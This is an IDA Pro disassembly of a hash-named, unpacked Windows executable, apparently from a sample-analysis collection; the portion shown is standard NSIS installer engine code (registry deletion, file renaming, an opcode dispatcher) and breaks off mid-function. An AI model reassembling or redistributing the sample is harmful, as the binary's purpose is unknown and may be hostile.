;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BC6FFD153689AAB380D2D66CC176BBBB
; File Name : u:\work\bc6ffd153689aab380d2d66cc176bbbb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000648A ( 25738.)
; Section size in file : 0000648A ( 25738.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_405A5A+12B�o
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 5Ch
cmp [ebp+arg_4], 0Fh
jz short loc_401037
cmp [ebp+arg_4], 46h
mov eax, [ebp+arg_C]
jnz short loc_401022
or dword ptr [eax+18h], 10h
mov ecx, dword_4263E0
mov [eax+4], ecx
loc_401022: ; CODE XREF: sub_401000+13�j
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_408260 ; DefWindowProcA
jmp locret_401179
; ---------------------------------------------------------------------------
loc_401037: ; CODE XREF: sub_401000+A�j
push ebx
push esi
mov esi, dword_4263E8
push edi
lea eax, [ebp+var_5C]
push eax
push [ebp+arg_0]
call ds:dword_408264 ; BeginPaint
and [ebp+var_C], 0
mov [ebp+arg_4], eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call ds:dword_408268 ; GetClientRect
mov edi, [ebp+var_10]
and [ebp+var_10], 0
mov ebx, ds:dword_408040
jmp loc_4010F3
; ---------------------------------------------------------------------------
loc_401073: ; CODE XREF: sub_401000+F6�j
movzx eax, byte ptr [esi+52h]
movzx edx, byte ptr [esi+56h]
imul edx, [ebp+var_18]
mov ecx, edi
sub ecx, [ebp+var_18]
imul eax, ecx
add eax, edx
cdq
idiv edi
xor edx, edx
mov [ebp+arg_8], ecx
mov dh, al
movzx eax, byte ptr [esi+51h]
imul eax, ecx
movzx ecx, byte ptr [esi+55h]
imul ecx, [ebp+var_18]
add eax, ecx
mov ecx, edx
cdq
idiv edi
movzx edx, byte ptr [esi+54h]
imul edx, [ebp+var_18]
mov cl, al
movzx eax, byte ptr [esi+50h]
imul eax, [ebp+arg_8]
add eax, edx
cdq
idiv edi
shl ecx, 8
movzx eax, al
or ecx, eax
lea eax, [ebp+var_C]
push eax
mov [ebp+var_8], ecx
call ds:dword_408044 ; CreateBrushIndirect
add [ebp+var_10], 4
push eax
mov [ebp+arg_C], eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_40826C ; FillRect
push [ebp+arg_C]
call ebx ; DeleteObject
add [ebp+var_18], 4
loc_4010F3: ; CODE XREF: sub_401000+6E�j
cmp [ebp+var_18], edi
jl loc_401073
cmp dword ptr [esi+58h], 0FFFFFFFFh
jz short loc_401167
push dword ptr [esi+34h]
call ds:dword_408048 ; CreateFontIndirectA
test eax, eax
mov [ebp+arg_C], eax
jz short loc_401167
mov edi, [ebp+arg_4]
push 1
push edi
mov [ebp+var_1C], 10h
mov [ebp+var_18], 8
call ds:dword_40804C ; SetBkMode
push dword ptr [esi+58h]
push edi
call ds:dword_408050 ; SetTextColor
push [ebp+arg_C]
mov esi, ds:dword_408058
push edi
call esi ; SelectObject
push 820h
mov [ebp+arg_4], eax
lea eax, [ebp+var_1C]
push eax
push 0FFFFFFFFh
push offset aNsisError ; "NSIS Error"
push edi
call ds:dword_408270 ; DrawTextA
push [ebp+arg_4]
push edi
call esi ; SelectObject
push [ebp+arg_C]
call ebx ; DeleteObject
loc_401167: ; CODE XREF: sub_401000+100�j
; sub_401000+110�j
lea eax, [ebp+var_5C]
push eax
push [ebp+arg_0]
call ds:dword_408274 ; EndPaint
pop edi
pop esi
xor eax, eax
pop ebx
locret_401179: ; CODE XREF: sub_401000+32�j
leave
retn 10h
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40117D proc near ; CODE XREF: sub_401610+1B1D�p
; sub_404A94+33D�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, dword_426408
mov edx, ecx
imul edx, 418h
mov edx, [edx+eax+8]
test dl, 2
jz short locret_4011EC
push esi
push edi
lea esi, [ecx+1]
xor edi, edi
cmp esi, dword_42640C
jnb short loc_4011EA
mov ecx, esi
imul ecx, 418h
lea eax, [ecx+eax+8]
push ebx
loc_4011B3: ; CODE XREF: sub_40117D+6A�j
mov ecx, [eax]
test cl, 2
jz short loc_4011BD
inc edi
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011BD: ; CODE XREF: sub_40117D+3B�j
test cl, 4
jz short loc_4011CB
mov ecx, edi
dec edi
test ecx, ecx
jz short loc_4011E9
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CB: ; CODE XREF: sub_40117D+43�j
test cl, 10h
jnz short loc_4011DB
mov ebx, ecx
xor ebx, edx
and ebx, 1
xor ebx, ecx
mov [eax], ebx
loc_4011DB: ; CODE XREF: sub_40117D+3E�j
; sub_40117D+4C�j ...
inc esi
add eax, 418h
cmp esi, dword_42640C
jb short loc_4011B3
loc_4011E9: ; CODE XREF: sub_40117D+4A�j
pop ebx
loc_4011EA: ; CODE XREF: sub_40117D+27�j
pop edi
pop esi
locret_4011EC: ; CODE XREF: sub_40117D+18�j
retn 4
sub_40117D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011EF proc near ; CODE XREF: sub_4011EF+57�p
; sub_40129E+4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push ebx
push esi
mov esi, edx
imul esi, 418h
push edi
mov edi, dword_426408
mov eax, [esi+edi+8]
xor ecx, ecx
test al, 2
mov [ebp+var_4], ecx
mov [ebp+var_8], ecx
jz short loc_401225
cmp [ebp+arg_4], ecx
jnz short loc_401225
and eax, 0FFFFFFBEh
mov [esi+edi+8], eax
inc edx
loc_401225: ; CODE XREF: sub_4011EF+27�j
; sub_4011EF+2C�j
cmp edx, dword_42640C
jnb short loc_401271
loc_40122D: ; CODE XREF: sub_4011EF+80�j
mov eax, edx
imul eax, 418h
lea ebx, [eax+edi+8]
mov ecx, [ebx]
test cl, 2
lea eax, [edx+1]
jz short loc_40124D
push 0
push edx
call sub_4011EF
mov ecx, [ebx]
loc_40124D: ; CODE XREF: sub_4011EF+52�j
test cl, 4
jnz short loc_40127A
test cl, 40h
jz short loc_40125A
inc [ebp+var_4]
loc_40125A: ; CODE XREF: sub_4011EF+66�j
test cl, 1
jz short loc_401264
inc [ebp+var_4]
jmp short loc_401267
; ---------------------------------------------------------------------------
loc_401264: ; CODE XREF: sub_4011EF+6E�j
inc [ebp+var_8]
loc_401267: ; CODE XREF: sub_4011EF+73�j
cmp eax, dword_42640C
mov edx, eax
jb short loc_40122D
loc_401271: ; CODE XREF: sub_4011EF+3C�j
xor eax, eax
loc_401273: ; CODE XREF: sub_4011EF+8F�j
; sub_4011EF+9E�j ...
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
loc_40127A: ; CODE XREF: sub_4011EF+61�j
cmp [ebp+var_4], 0
jz short loc_401273
cmp [ebp+var_8], 0
lea ecx, [esi+edi+8]
jz short loc_40128F
or dword ptr [ecx], 40h
jmp short loc_401273
; ---------------------------------------------------------------------------
loc_40128F: ; CODE XREF: sub_4011EF+99�j
mov edx, [ecx]
and edx, 0FFFFFF7Fh
or edx, 1
mov [ecx], edx
jmp short loc_401273
sub_4011EF endp
; =============== S U B R O U T I N E =======================================
sub_40129E proc near ; CODE XREF: sub_401610+1B49�p
; sub_404A94+478�p ...
push 1
push 0
call sub_4011EF
retn
sub_40129E endp
; =============== S U B R O U T I N E =======================================
sub_4012A8 proc near ; CODE XREF: sub_401610+1B44�p
; sub_404A94+3F9�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, dword_426408
push esi
xor esi, esi
cmp ecx, 20h
jnb short loc_4012EF
cmp dword_42640C, esi
jbe short loc_4012EF
lea edx, [eax+8]
push edi
loc_4012C5: ; CODE XREF: sub_4012A8+44�j
mov eax, [edx]
test al, 6
jnz short loc_4012DF
xor edi, edi
inc edi
shl edi, cl
test [edx-4], edi
jz short loc_4012DA
or eax, 1
jmp short loc_4012DD
; ---------------------------------------------------------------------------
loc_4012DA: ; CODE XREF: sub_4012A8+2B�j
and eax, 0FFFFFFFEh
loc_4012DD: ; CODE XREF: sub_4012A8+30�j
mov [edx], eax
loc_4012DF: ; CODE XREF: sub_4012A8+21�j
inc esi
add edx, 418h
cmp esi, dword_42640C
jb short loc_4012C5
pop edi
loc_4012EF: ; CODE XREF: sub_4012A8+F�j
; sub_4012A8+17�j
pop esi
retn 4
sub_4012A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012F3 proc near ; CODE XREF: sub_401610+1B51�p
; sub_404A94+494�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_4263E8
and [ebp+var_4], 0
push ebx
push esi
add eax, 94h
push edi
mov edi, dword_42640C
mov [ebp+var_8], eax
loc_401313: ; CODE XREF: sub_4012F3+7F�j
mov eax, [ebp+var_8]
xor ebx, ebx
cmp [eax], ebx
jz short loc_401367
cmp ebx, edi
jnb short loc_401365
mov esi, dword_426408
add esi, 8
loc_401329: ; CODE XREF: sub_4012F3+6E�j
mov edx, [esi]
test dl, 6
jnz short loc_401358
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_40133D
cmp dword ptr [eax+ebx*4], 0
jz short loc_401358
loc_40133D: ; CODE XREF: sub_4012F3+42�j
mov ecx, [ebp+var_4]
xor eax, eax
inc eax
shl eax, cl
mov ecx, [esi-4]
and edx, 1
and ecx, eax
mov eax, ecx
mov ecx, [ebp+var_4]
shl edx, cl
cmp eax, edx
jnz short loc_401363
loc_401358: ; CODE XREF: sub_4012F3+3B�j
; sub_4012F3+48�j
inc ebx
add esi, 418h
cmp ebx, edi
jb short loc_401329
loc_401363: ; CODE XREF: sub_4012F3+63�j
cmp ebx, edi
loc_401365: ; CODE XREF: sub_4012F3+2B�j
jz short loc_401374
loc_401367: ; CODE XREF: sub_4012F3+27�j
inc [ebp+var_4]
add [ebp+var_8], 4
cmp [ebp+var_4], 20h
jb short loc_401313
loc_401374: ; CODE XREF: sub_4012F3:loc_401365�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn 4
sub_4012F3 endp
; =============== S U B R O U T I N E =======================================
sub_40137E proc near ; CODE XREF: sub_403756+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp dword_40A084, 0
push esi
jnz short loc_4013B5
xor ecx, ecx
loc_40138A: ; CODE XREF: sub_40137E+35�j
push 8
mov eax, ecx
pop esi
loc_40138F: ; CODE XREF: sub_40137E+25�j
mov edx, eax
and dl, 1
neg dl
sbb edx, edx
and edx, 0EDB88320h
shr eax, 1
xor eax, edx
dec esi
jnz short loc_40138F
mov dword_40A080[ecx*4], eax
inc ecx
cmp ecx, 100h
jl short loc_40138A
loc_4013B5: ; CODE XREF: sub_40137E+8�j
mov esi, [esp+4+arg_8]
test esi, esi
mov eax, [esp+4+arg_0]
not eax
jbe short loc_4013E1
mov ecx, [esp+4+arg_4]
loc_4013C7: ; CODE XREF: sub_40137E+61�j
xor edx, edx
mov dl, [ecx]
xor edx, eax
and edx, 0FFh
shr eax, 8
xor eax, dword_40A080[edx*4]
inc ecx
dec esi
jnz short loc_4013C7
loc_4013E1: ; CODE XREF: sub_40137E+43�j
not eax
pop esi
retn 0Ch
sub_40137E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013E7 proc near ; CODE XREF: sub_4014C9+10�p
; sub_401610+E4�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
test edi, edi
jl loc_4014B9
mov esi, [ebp+arg_4]
mov ebx, 400h
loc_401400: ; CODE XREF: sub_4013E7+CC�j
mov ecx, dword_426410
mov eax, edi
shl eax, 5
add eax, ecx
mov ecx, [eax]
cmp ecx, 1
jz loc_4014B9
test dword_426444, ebx
jz short loc_40142A
cmp ecx, 14h
jz short loc_40142A
cmp ecx, 3Eh
jnz short loc_40145D
loc_40142A: ; CODE XREF: sub_4013E7+37�j
; sub_4013E7+3C�j
push eax
call sub_401610
mov esi, eax
cmp esi, 7FFFFFFFh
jz loc_4014C2
test dword_426444, ebx
jnz short loc_40145D
test esi, esi
jge short loc_40145F
inc esi
shl esi, 0Ah
mov eax, offset dword_427000
sub eax, esi
push eax
call sub_405F74
mov esi, eax
loc_40145D: ; CODE XREF: sub_4013E7+41�j
; sub_4013E7+5D�j
test esi, esi
loc_40145F: ; CODE XREF: sub_4013E7+61�j
jz short loc_401472
test dword_426444, ebx
jnz short loc_401472
dec esi
mov eax, edi
mov edi, esi
sub esi, eax
jmp short loc_401474
; ---------------------------------------------------------------------------
loc_401472: ; CODE XREF: sub_4013E7:loc_40145F�j
; sub_4013E7+80�j
inc esi
inc edi
loc_401474: ; CODE XREF: sub_4013E7+89�j
cmp [ebp+arg_4], 0
jz short loc_4014B1
mov eax, dword_425BC4
add dword_425BCC, esi
xor ecx, ecx
test eax, eax
setz cl
push 0
add ecx, eax
push ecx
push 7530h
push dword_425BCC
call ds:dword_408124 ; MulDiv
push eax
push 402h
push [ebp+arg_4]
call ds:dword_408278 ; SendMessageA
loc_4014B1: ; CODE XREF: sub_4013E7+91�j
test edi, edi
jge loc_401400
loc_4014B9: ; CODE XREF: sub_4013E7+B�j
; sub_4013E7+2B�j
xor eax, eax
loc_4014BB: ; CODE XREF: sub_4013E7+E0�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_4014C2: ; CODE XREF: sub_4013E7+51�j
mov eax, 7FFFFFFFh
jmp short loc_4014BB
sub_4013E7 endp
; =============== S U B R O U T I N E =======================================
sub_4014C9 proc near ; CODE XREF: start+485�p sub_4041F2+44�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, dword_4263E8
push 0
push dword ptr [ecx+eax*4+6Ch]
call sub_4013E7
retn 4
sub_4014C9 endp
; =============== S U B R O U T I N E =======================================
sub_4014E1 proc near ; CODE XREF: sub_401610+26B�p
; sub_401610+35E�p ...
arg_0 = dword ptr 4
push offset byte_40A888
push [esp+4+arg_0]
call sub_40509F
retn 4
sub_4014E1 endp
; =============== S U B R O U T I N E =======================================
sub_4014F2 proc near ; CODE XREF: sub_401610+13F�p
; sub_401610+183�p ...
mov eax, dword_40C0C4
push dword ptr [eax+ecx*4]
push 0
call sub_4065B7
push eax
call sub_405F74
retn
sub_4014F2 endp
; =============== S U B R O U T I N E =======================================
sub_401508 proc near ; CODE XREF: sub_4015C7+2D�p
; sub_401610+79�p ...
test esi, esi
mov eax, esi
jge short loc_401510
neg eax
loc_401510: ; CODE XREF: sub_401508+4�j
mov edx, dword_40C0C4
mov ecx, eax
sar eax, 4
push edi
and ecx, 0Fh
push dword ptr [edx+ecx*4]
shl eax, 0Ah
add eax, offset dword_40A488
push eax
call sub_4065B7
test esi, esi
mov edi, eax
jge short loc_40153C
push edi
call sub_406009
loc_40153C: ; CODE XREF: sub_401508+2C�j
mov eax, edi
pop edi
retn
sub_401508 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401540 proc near ; CODE XREF: sub_401540+42�p
; sub_401610+137C�p
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
lea eax, [ebp+var_4]
push eax
push 8
xor ebx, ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_408008 ; RegOpenKeyExA
cmp eax, ebx
jnz short loc_4015B2
mov esi, ds:dword_408004
mov edi, 105h
jmp short loc_40158B
; ---------------------------------------------------------------------------
loc_401572: ; CODE XREF: sub_401540+5B�j
cmp [ebp+arg_8], ebx
jnz short loc_4015B9
push ebx
lea eax, [ebp+var_10C]
push eax
push [ebp+var_4]
call sub_401540
test eax, eax
jnz short loc_40159D
loc_40158B: ; CODE XREF: sub_401540+30�j
push edi
lea eax, [ebp+var_10C]
push eax
push ebx
push [ebp+var_4]
call esi ; RegEnumKeyA
test eax, eax
jz short loc_401572
loc_40159D: ; CODE XREF: sub_401540+49�j
push [ebp+var_4]
call ds:dword_408020 ; RegCloseKey
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_408000 ; RegDeleteKeyA
loc_4015B2: ; CODE XREF: sub_401540+23�j
; sub_401540+85�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_4015B9: ; CODE XREF: sub_401540+35�j
push [ebp+var_4]
call ds:dword_408020 ; RegCloseKey
xor eax, eax
inc eax
jmp short loc_4015B2
sub_401540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015C7 proc near ; CODE XREF: sub_401610+1305�p
; sub_401610+14BC�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, dword_40C0C4
mov eax, [eax+4]
test eax, eax
push esi
push edi
jz short loc_4015DC
mov edi, eax
jmp short loc_4015E8
; ---------------------------------------------------------------------------
loc_4015DC: ; CODE XREF: sub_4015C7+F�j
mov edi, dword_426464
add edi, 80000001h
loc_4015E8: ; CODE XREF: sub_4015C7+13�j
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_0]
push 0
push 22h
pop esi
call sub_401508
push eax
push edi
call ds:dword_408008 ; RegOpenKeyExA
neg eax
sbb eax, eax
not eax
and eax, [ebp+arg_0]
pop edi
pop esi
pop ebp
retn 4
sub_4015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401610 proc near ; CODE XREF: sub_4013E7+44�p
var_1A4 = byte ptr -1A4h
var_178 = byte ptr -178h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov eax, dword_4263E0
and [ebp+var_C], 0
and [ebp+var_4], 0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 8
pop ecx
lea edi, [ebp+var_3C]
rep movsd
mov edx, [ebp+var_34]
mov esi, [ebp+var_38]
lea ecx, [ebp+var_38]
mov dword_40C0C4, ecx
mov ecx, [ebp+var_3C]
mov [ebp+var_10], eax
mov ebx, edx
shl ebx, 0Ah
mov eax, esi
shl eax, 0Ah
add ecx, 0FFFFFFFEh
add ebx, offset dword_427000
cmp ecx, 42h ; switch 67 cases
lea edi, dword_427000[eax]
ja loc_4031D2 ; default
; jumptable 0040166B cases 64,65
jmp ds:off_4031E4[ecx*4] ; switch jump
loc_401672: ; DATA XREF: .text:off_4031E4�o
push esi ; jumptable 0040166B case 0
push offset aJumpD ; "Jump: %d"
call sub_40614C
mov eax, [ebp+var_38]
pop ecx
pop ecx
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_401687: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 1
call sub_401508
push eax
push offset aAbortingS ; "Aborting: \"%s\""
call sub_40614C
pop ecx
pop ecx
push esi
push [ebp+var_38]
loc_40169F: ; CODE XREF: sub_401610+63C�j
call sub_40509F
jmp loc_402E4D
; ---------------------------------------------------------------------------
loc_4016A9: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
inc dword_425BB4 ; jumptable 0040166B case 2
cmp [ebp+var_10], 0
jz loc_402E4D
push 0
call ds:dword_408180 ; PostQuitMessage
jmp loc_402E4D
; ---------------------------------------------------------------------------
loc_4016C6: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
test esi, esi ; jumptable 0040166B case 3
jge short loc_4016DF
mov ecx, offset dword_427000
sub ecx, eax
sub ecx, 400h
push ecx
call sub_405F74
jmp short loc_4016E1
; ---------------------------------------------------------------------------
loc_4016DF: ; CODE XREF: sub_401610+B8�j
mov eax, esi
loc_4016E1: ; CODE XREF: sub_401610+CD�j
lea esi, [eax-1]
push esi
push offset aCallD ; "Call: %d"
call sub_40614C
pop ecx
pop ecx
push 0
push esi
call sub_4013E7
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_4016FE: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
test edx, edx ; jumptable 0040166B case 4
jz short loc_40172B
test dl, 8
jz short loc_401716
mov eax, dword_40A008
mov dword_40A040, eax
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401716: ; CODE XREF: sub_401610+F5�j
mov eax, dword_40A040
mov dword_40A008, eax
mov dword_40A040, edx
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_40172B: ; CODE XREF: sub_401610+F0�j
xor esi, esi
call sub_401508
push eax
push offset aDetailprintS ; "detailprint: %s"
call sub_40614C
pop ecx
pop ecx
push esi
push [ebp+var_38]
call sub_40509F
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_40174D: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 5
call sub_4014F2
mov esi, eax
push esi
push offset aSleepD ; "Sleep(%d)"
call sub_40614C
cmp esi, 1
pop ecx
pop ecx
jg short loc_40176B
xor esi, esi
inc esi
loc_40176B: ; CODE XREF: sub_401610+156�j
push esi
call ds:dword_4080B0 ; Sleep
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401777: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push offset aBringtofront ; jumptable 0040166B case 6
call sub_40614C
pop ecx
push [ebp+var_10]
call ds:dword_408224 ; SetForegroundWindow
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401790: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 11
inc ecx
call sub_4014F2
mov ecx, [ebp+var_38]
mov dword_426460[ecx*4], eax
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_4017A7: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
mov ecx, [ebp+var_30] ; jumptable 0040166B case 12
mov edx, [ebp+var_2C]
xor eax, eax
lea ecx, ds:426460h[ecx*4]
cmp [ecx], eax
setz al
and [ecx], edx
mov eax, [ebp+eax*4+var_38]
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_4017C6: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push dword_426460[edx*4] ; jumptable 0040166B case 13
loc_4017CD: ; CODE XREF: sub_401610+7AE�j
; sub_401610+958�j ...
push edi
jmp loc_403168
; ---------------------------------------------------------------------------
loc_4017D3: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
mov eax, dword_425BC0 ; jumptable 0040166B case 7
test eax, eax
mov edi, ds:dword_408228
jz short loc_4017E9
push edx
push eax
call edi ; ShowWindow
mov esi, [ebp+var_38]
loc_4017E9: ; CODE XREF: sub_401610+1D0�j
mov eax, dword_425BAC
test eax, eax
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push esi
push eax
call edi ; ShowWindow
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_4017FF: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFF0h ; jumptable 0040166B case 8
pop esi
call sub_401508
push [ebp+var_34]
mov esi, eax
push esi
push offset aSetfileattribu ; "SetFileAttributes: \"%s\":%08X"
call sub_40614C
add esp, 0Ch
push [ebp+var_34]
push esi
call ds:dword_4080AC ; SetFileAttributesA
test eax, eax
jnz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push offset aSetfileattri_0 ; "SetFileAttributes failed."
mov [ebp+var_4], 1
call sub_40614C
jmp loc_4030AB
; ---------------------------------------------------------------------------
loc_401842: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFF0h ; jumptable 0040166B case 9
pop esi
call sub_401508
push [ebp+var_34]
mov esi, eax
push esi
push offset aCreatedirector ; "CreateDirectory: \"%s\" (%d)"
call sub_40614C
add esp, 0Ch
cmp byte ptr [esi], 0
jz short loc_401873
push esi
call sub_406301
test eax, eax
jnz short loc_401873
mov [ebp+var_4], 1
loc_401873: ; CODE XREF: sub_401610+250�j
; sub_401610+25A�j
cmp [ebp+var_34], 0
jz short loc_401897
push 0FFFFFFE6h
call sub_4014E1
push esi
push offset dword_42C800
call sub_405FFD ; lstrcpy
push esi
call ds:dword_4080A8 ; SetCurrentDirectoryA
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401897: ; CODE XREF: sub_401610+267�j
push 0FFFFFFF5h
jmp loc_40277C
; ---------------------------------------------------------------------------
loc_40189E: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 10
call sub_401508
mov esi, eax
push esi
call sub_406168
test eax, eax
jz short loc_4018C7
push [ebp+var_34]
push esi
push offset aIffileexistsFi ; "IfFileExists: file \"%s\" exists, jumping"...
call sub_40614C
add esp, 0Ch
jmp loc_402124
; ---------------------------------------------------------------------------
loc_4018C7: ; CODE XREF: sub_401610+29F�j
push [ebp+var_30]
push esi
push offset aIffileexists_0 ; "IfFileExists: file \"%s\" does not exist,"...
call sub_40614C
add esp, 0Ch
loc_4018D8: ; CODE XREF: sub_401610+857�j
; sub_401610+8AF�j ...
mov eax, [ebp+var_30]
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_4018E0: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFD0h ; jumptable 0040166B case 14
pop esi
call sub_401508
push 0FFFFFFDFh
pop esi
mov [ebp+arg_0], eax
call sub_401508
push [ebp+arg_0]
mov ebx, offset byte_40A888
push ebx
mov edi, eax
call sub_405FFD ; lstrcpy
push edi
call sub_406003 ; lstrlen
push [ebp+arg_0]
mov esi, eax
call sub_406003 ; lstrlen
add esi, eax
cmp esi, 3FDh
jge short loc_40192F
mov esi, ds:dword_4080A4
push offset asc_4087B0 ; "->"
push ebx
call esi ; lstrcat
push edi
push ebx
call esi ; lstrcat
loc_40192F: ; CODE XREF: sub_401610+30B�j
push ebx
push offset aRenameS ; "Rename: %s"
call sub_40614C
pop ecx
pop ecx
push edi
push [ebp+arg_0]
call ds:dword_4080A0 ; MoveFileA
test eax, eax
jz short loc_401951
push 0FFFFFFE3h
jmp loc_40277C
; ---------------------------------------------------------------------------
loc_401951: ; CODE XREF: sub_401610+338�j
cmp [ebp+var_30], 0
jz short loc_40197E
push [ebp+arg_0]
call sub_406168
test eax, eax
jz short loc_40197E
push edi
push [ebp+arg_0]
call sub_406357
push 0FFFFFFE4h
call sub_4014E1
push ebx
push offset aRenameOnReboot ; "Rename on reboot: %s"
jmp loc_4030A5
; ---------------------------------------------------------------------------
loc_40197E: ; CODE XREF: sub_401610+345�j
; sub_401610+351�j
push ebx
mov [ebp+var_4], 1
push offset aRenameFailedS ; "Rename failed: %s"
jmp loc_4030A5
; ---------------------------------------------------------------------------
loc_401990: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 15
call sub_401508
mov esi, eax
lea eax, [ebp+arg_0]
push eax
push ebx
